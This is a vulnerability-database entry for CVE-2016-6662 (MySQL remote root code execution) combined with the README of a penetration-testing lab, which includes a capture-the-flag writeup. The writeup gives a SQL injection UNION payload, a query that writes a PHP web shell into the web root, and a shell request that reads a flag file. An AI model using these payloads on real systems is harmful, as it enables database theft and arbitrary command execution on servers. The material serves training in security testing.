POC详情: 7fb39e7a83f8a7c127d59b1d836b9b8e3430020d

标题: Oracle MySQL 远程代码执行漏洞/提权漏洞 (CVE-2016-6662)
描述:Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。该数据库系统具有性能高、成本低、可靠性好等特点。 Oracle MySQL中的配置文件(my.cnf)存在远程代码执行漏洞。攻击者(本地或远程)可通过授权访问MySQL数据库(网络连接或类似phpMyAdmin的Web接口)或SQL注入方式,利用该漏洞向配置文件中注入恶意的数据库配置,导致以root权限执行任意代码,完全控制受影响的服务器。以下版本受到影响:Oracle MySQL 5.5.52及之前的版本,5.6.x
This lab dedicated to learning penetration testing skill with CVE-2016-6662: MySQL Remote Root Code Execution
## About this lab

This lab is dedicated for learning penetration testing skill through *CVE-2016-6662: MySQL Remote Root Code Execution*

### Core logic:
The problem with this CVE lies in the secure_file_priv variable, which was added in MySQL version 5.5.53.
It was supposed to add a layer of security since it restricted the privilege to read or write anywhere, which happened a lot back then.
However, in the early stages of version 5.6 up to version 5.7.6, the default value of secure_file_priv is null, so nothing is changed if the database admin doesn't take extra notice at that point.

### Writeup:
1. The first part of the flag is inside the database, you will get it with this payload: `1 UNION SELECT NULL, flag from flags`
2. The second part of the flag is located at the root folder of the server. You first create a PHP shell code with this:
select '<?php $output=shell_exec($_GET["cmd"]);
echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
This create a PHP file with cmd parameter that take value from input and parse it to shell_exec() function - a PHP function that executing shell command.

3. With that parameter, you will get: `/shell.php?cmd=cat /flag.txt`.

4. You get the flag.


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